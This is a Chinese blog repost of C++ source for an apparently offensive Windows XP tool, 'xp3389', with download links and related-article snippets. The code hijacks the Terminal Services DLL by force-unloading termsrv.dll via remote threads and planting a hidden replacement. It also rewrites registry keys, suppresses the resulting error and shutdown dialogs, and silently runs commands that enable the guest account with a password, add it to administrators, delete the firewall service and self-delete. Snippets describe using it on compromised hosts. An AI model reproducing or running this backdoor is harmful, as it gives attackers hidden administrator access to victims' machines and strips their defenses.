原创 xp下双开3389源码收藏

最新推荐文章于 2024-04-18 18:28:19 发布
最新推荐文章于 2024-04-18 18:28:19 发布
阅读量1.1k 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: xp null file dll token path
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/StudyFromEveryOne/article/details/2623132 
// xp3389.cpp : XP下双开3389的工具 Code By CoolDiyer

//

#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")

#include "stdafx.h"

#include "resource.h"

#include 

#include 

DWORD

GetProcessId(LPCTSTR szProcName)

{

PROCESSENTRY32 pe;

DWORD dwPid;

DWORD dwRet;

BOOL bFound = FALSE;



HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if (hSP)

{

  pe.dwSize = sizeof( pe );



  for (dwRet = Process32First(hSP, &pe);

  dwRet;

  dwRet = Process32Next(hSP, &pe))

  {

   if (lstrcmpi( szProcName, pe.szExeFile) == 0)

   {

    dwPid = pe.th32ProcessID;

    bFound = TRUE;

    break;

   }

  }

  CloseHandle(hSP);



  if (bFound == TRUE)

  {

   return dwPid;

  }

}

return NULL;

}



bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)

{

if (!IsWindowVisible(hwnd))

  return true;



DWORD dwWindowThreadId = NULL;

DWORD  dwLsassId = (DWORD)lParam;

GetWindowThreadProcessId(hwnd, &dwWindowThreadId);

if (dwWindowThreadId == (DWORD)lParam)

{

  // 关闭指定进程的窗口

  SendMessage(hwnd, WM_CLOSE, 0, 0);

}

return true;

}

// 写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) from NameLess114

int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode)

{

HKEY  hKey;

DWORD dwDisposition;

int   iResult =0;



__try

{

  // SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);

  switch(Mode)

  {

  case 0:

   if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)

    __leave;

  case 1:

   if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)

    __leave;

   switch(Type)

   {

   case REG_SZ:

   case REG_EXPAND_SZ:

    if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1) == ERROR_SUCCESS)

     iResult =1;

    break;

   case REG_DWORD:

                if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS)

     iResult =1;

    break;

   case REG_BINARY:

    break;

   }

   break;

   case 2:

    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)

     __leave;

    if (RegDeleteKey(hKey,Vname) == ERROR_SUCCESS)

     iResult =1;

    break;

   case 3:

    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)

     __leave;

    if (RegDeleteValue(hKey,Vname) == ERROR_SUCCESS)

     iResult =1;

    break;

  }

}

__finally

{

  RegCloseKey(MainKey);

  RegCloseKey(hKey);

}

return iResult;

}

bool DebugPrivilege(const char *PName, BOOL bEnable)

{

BOOL              bResult = TRUE;

HANDLE            hToken;

TOKEN_PRIVILEGES  TokenPrivileges;



if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))

{

  bResult = FALSE;

  return bResult;

}

TokenPrivileges.PrivilegeCount = 1;

TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;



LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);

AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);

    if (GetLastError() != ERROR_SUCCESS)

{

  bResult = FALSE;

}



CloseHandle(hToken);

return bResult;

}

bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle)

{

HANDLE hRemoteThread;

HANDLE hProcess;



if (hModuleHandle == NULL)

  return false;

hProcess=::OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID);

if (hProcess == NULL)

  return false;



HMODULE hModule=::GetModuleHandle(”kernel32.dll”);

LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, “FreeLibrary”);

hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);



if(hRemoteThread==NULL)

{

  ::CloseHandle(hProcess);

  return false;

}

::WaitForSingleObject(hRemoteThread,INFINITE);

::CloseHandle(hProcess);

::CloseHandle(hRemoteThread);

return true;

}

HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath)

{

HANDLE hModuleHandle = NULL;

MODULEENTRY32 me32={0};

HANDLE hModuleSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);

me32.dwSize=sizeof(MODULEENTRY32);

if(::Module32First(hModuleSnap, &me32))

{

  do

  {

   if (!lstrcmpi(me32.szExePath, lpModulePath))

   {

    hModuleHandle = me32.hModule;

    break;

   }

  }while(::Module32Next(hModuleSnap,&me32));

}

::CloseHandle(hModuleSnap);

return hModuleHandle;

}

bool UnloadModule(LPCTSTR lpModulePath)

{

BOOL bRet = false;

PROCESSENTRY32 pe32;

pe32.dwSize = sizeof(pe32);



HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);



//查找相关的进程

if(::Process32First(hProcessSnap, &pe32))

{

  do

  {

   HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);

   if (hModuleHandle != NULL)

   {

    bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);

   }

  }while (Process32Next(hProcessSnap,&pe32));

}

CloseHandle(hProcessSnap);

return bRet;

}

void StartService(LPCTSTR lpService)

{

SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );

if ( NULL != hSCManager )

{

  SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);

  if ( NULL != hService )

  {

   StartService(hService, 0, NULL);

   CloseServiceHandle( hService );

  }

  CloseServiceHandle( hSCManager );

}

}

BOOL ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)

{

HGLOBAL hRes;

HRSRC hResInfo;

HANDLE hFile;

DWORD dwBytes;



hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);

if (hResInfo == NULL)

  return FALSE;

hRes = LoadResource(NULL, hResInfo);

if (hRes == NULL)

  return FALSE;

hFile = CreateFile

  (

  lpFileName,

  GENERIC_WRITE,

  FILE_SHARE_WRITE,

  NULL,

  CREATE_ALWAYS,

  FILE_ATTRIBUTE_NORMAL,

  NULL

  );

if (hFile == NULL)

  return FALSE;

WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);

CloseHandle(hFile);



return TRUE;

}

void SetReg()

{

WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM//CurrentControlSet//Services//TermService”,”Start”,REG_DWORD,NULL,2,0);

WriteRegEx(HKEY_LOCAL_MACHINE, “SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon”, “KeepRASConnections”, REG_SZ, “1″, 0, 0);

WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM//CurrentControlSet//Control//Terminal Server”, “fDenyTSConnections”, REG_DWORD, NULL, 0, 0);

WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM//CurrentControlSet//Control//Terminal Server//Licensing Core”, “EnableConcurrentSessions”,

  REG_DWORD, NULL, 1, 0);

WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM//CurrentControlSet//Services//TermService//Parameters”, “ServiceDll”, REG_EXPAND_SZ,

  “%SystemRoot%//system32//termsrvhack.dll”, 0, 0);

}

void ReleaseDll()

{

char strSystemPath[MAX_PATH];

char strDllcachePath[MAX_PATH];

GetSystemDirectory(strSystemPath, sizeof(strSystemPath));

GetSystemDirectory(strDllcachePath, sizeof(strDllcachePath));

lstrcat(strSystemPath, “//termsrvhack.dll”);

lstrcat(strDllcachePath, “//dllcache//termsrvhack.dll”);

ReleaseResource(IDR_DLL, “BIN”, strSystemPath);

ReleaseResource(IDR_DLL, “BIN”, strDllcachePath);

SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);

SetFileAttributes(strDllcachePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);

}

bool IsOSXP()

{

OSVERSIONINFOEX OsVerInfoEx;

OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);

GetVersionEx((OSVERSIONINFO *)&OsVerInfoEx); // 注意转换类型

return OsVerInfoEx.dwMajorVersion == 5 && OsVerInfoEx.dwMinorVersion == 1;

}

void HijackService()

{

char strDll[MAX_PATH];

GetSystemDirectory(strDll, sizeof(strDll));

lstrcat(strDll, “//termsrv.dll”);

// 释放termsrvhack.dll

ReleaseDll();



// 遍历进程卸载现在加载的DLL

DebugPrivilege(SE_DEBUG_NAME, TRUE);

if (!UnloadModule(strDll))

  return;

DebugPrivilege(SE_DEBUG_NAME, FALSE);



// 关闭要弹出的出错对话框和因DLL强制卸载使一些服务异常终止而弹出来的自动关机对话框

// 对进程赋予关闭权限

DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);

DWORD dwLsassId = GetProcessId(”csrss.exe”);

while (!AbortSystemShutdown(NULL))

{

  // 一些系统是会弹出drwtsn32.exe

  DWORD dwDrwtsn32Id = GetProcessId(”drwtsn32.exe”);

  if (dwDrwtsn32Id != NULL)

  {

   EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwDrwtsn32Id);

  }

  // 模块强制卸载时会出错,关闭csrss.exe进程弹出的出错窗口

  EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwLsassId);

  Sleep(10);

}

DebugPrivilege(SE_SHUTDOWN_NAME, FALSE);

}

int WINAPI WinMain(

       HINSTANCE hInstance,      // handle to current instance

       HINSTANCE hPrevInstance,  // handle to previous instance

       LPSTR lpCmdLine,          // command line

       int nCmdShow              // show state

       )

{

// 一些注册表的操作

SetReg();

if (IsOSXP())

{

  // 替换DLL

  HijackService();

}

// 开始终端服务

StartService(”TermService”);

// 激活guest,加管理员组,自删除,停止XP自带的防火墙,并删除它

char strCommand[1024];

char strSelf[MAX_PATH];

GetModuleFileName(NULL, strSelf, sizeof(strSelf));

wsprintf(strCommand, “cmd.exe /c net user guest /active:yes && net user guest cooldiyer && net localgroup administrators guest /add && net stop SharedAccess /y && del /”%s/” && sc delete SharedAccess”, strSelf);

WinExec(strCommand, SW_HIDE);

return 0;

}
下载地址:
xp3389_bin.rar (107.16 KB)
xp3389_src.rar (202.54 KB)
大浪淘沙1
关注
xp双开3389源码
05-27 1077
// xp3389.cpp : XP双开3389的工具 Code By CoolDiyer//#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")#include "stdafx.h"
双开XP3389和内网开3389工具教程
09-29
新人学习XP攻防战必备资源!网管无需购买付费软件的必备工具!
一步双开xp3389
11-06
一键双开XP3389,里面附带教程,一键式傻瓜操作,让小白有大神的操作!
XP双开3389.
testalllife的专栏
04-06 4536
所需工具: 开3389工具包(3389.bat、termsrvhack.dllxp3389.exe)以下是详细内容:一、确定要开刀肉鸡,先双开3389: 1、先看下是否能远程登陆,看来 没有开,无法登陆 2、把“3389工具包”内的termsrvhack.dllxp3389.exe 上传到肉鸡C盘根目录下 3、运行远程命令提示符,输入tasklist /svc >>c
XP双开3389远程控制的源码
07-22 2852
 // xp3389.cpp : XP双开3389的工具 Code By CoolDiyer//#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")#include "stdafx.h"#incl
XP系统双开3389工具-易语言
06-13
XP系统双开3389工具-易语言》是一款专为Windows XP系统设计的工具,主要用于实现远程桌面连接服务(RDP,Remote Desktop Protocol)的双开功能。3389是远程桌面服务默认使用的端口号,因此“3389工具”通常指的是...
易语言XP系统双开3389工具源码
05-23
XP系统双开3389工具 系统结构:双用户登录,打开终端,查看终端信息,重新启动计算机,关闭注册项,打开注册表项,写注册表项,
易语言源码易语言双开3389源码.rar
03-30
易语言双开3389源码是指利用易语言编写的程序源代码,该程序设计用于实现对远程桌面连接服务(RDP,通常使用的端口为3389)的双开功能。在Windows系统中,3389端口主要用于远程桌面连接,允许用户通过网络控制和管理...
易语言源码XP系统双开3389工具.rar
02-16
易语言源码XP系统双开3389工具.rar
3389双开工具(附使用说明)
01-23
3389双开工具(附使用说明) 只要上传肉鸡运行就可以了
远程双开3389工具超强 超简单
03-25
超级双开3389工具 超简单 菜鸟轻易上手使用~~~~~~~~~~~
XP系统双开3389工具.rar
04-05
XP系统双开3389工具.rar XP系统双开3389工具.rar XP系统双开3389工具.rar XP系统双开3389工具.rar XP系统双开3389工具.rar XP系统双开3389工具.rar
易语言XP系统双开3389工具
08-20
XP系统双开3389工具系统结构:双用户登录,打开终端,查看终端信息,重新启动计算机,关闭注册项,打开注册表项,写注册表项, ======程序集1 || ||------_启动子程序 || ||------双用户登录 || ||----
远程 双开3389 链接3389
12-09
远程 双开3389 链接3389远程 双开3389 链接3389远程 双开3389 链接3389
Win7双开3389
十年磨一剑,霜刃未曾试!
09-18 5375
首先更改termsrv.dll的文件所有者,然后将文件的可写权限设置成Everone或Administrator 再rename做一个备份,然后copy复制新的termsrv.dll   net stop termservice takeown /F C:\windows\system32\termsrv.dll /A echo y|cacls %systemroot%\system32
啊D扫肉鸡+无远控双开XP3389 termsrvhack.dll_本地测试
weixin_34413103的博客
01-10 523
好久不玩黑了,在网上看好多菜鸟在扫肉鸡,抱怨扫不到135 !现在都是自动扫描自动传马,到现在所学的东西都是自己Google加自己总结出来的,免杀做起来比较麻烦,学习中,从不DDOS别人,不充Q币不开会员,要那么多肉鸡也没什么用,×××也不是很感兴趣。得到肉鸡的方法很多,拿SHELL提权也可以得到很多,办公室上网,拿出啊D随便扫了下,三只服务器,N只XP。方法很简单:1、本机关...
termsrv.dll XP SP3 / Win7 32/64位 支持多用户远程桌面连接 双开3389
xx的专栏
07-01 6128
XP SP3 termsrv.dll 5.1.2600.5512  1. 下载破解的termsrv.dll 版本:5.1.2600.5512  2. 复制到C:\Windows\system32文件夹覆盖同名文件  3. 运行MultipleTS.bat文件; 4. 运行Gpedit.msc打开组策略,终端服务,限制连接数量改到2以上  5. 确保启用快速用户切换和允
双开不了3389有哪些原因?怎么解决
最新发布
day3ZY的博客
04-18 1184
在计算机网络领域,端口3389通常与远程桌面协议(RDP)相关,允许用户通过Internet远程访问和操作计算机。然而,当遇到“双开不了3389”的问题时,这通常意味着远程桌面连接无法建立或存在问题。在处理网络安全问题时,请确保遵循最佳实践和安全准则,以防止潜在的安全风险。确保本地和远程计算机的防火墙允许3389端口的通信。例如,在Windows系统中,可以降低UAC设置或允许远程用户通过远程桌面连接。本地或远程计算机的防火墙可能阻止了3389端口的访问。这可能是由于安全设置或错误的规则配置导致的。
Windows XP 3389(终端)多用户登陆
笨笨的专栏
05-27 2570
第一步:首先是在Windows XP上安装SP2正式版,按照常规方式安装即可,这里不再赘述。第二步:准备一份版本较早的SP2终端服务器软件(据说从Build 2082开始该功能就被禁止了,所以最好使用之前版本),中文SP2测试版较难找到,我用的是英文版Build 2055,运行之后没有发现任何问题。你可以从http://www.msfn.org/board/index.php?s=85a71ca2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值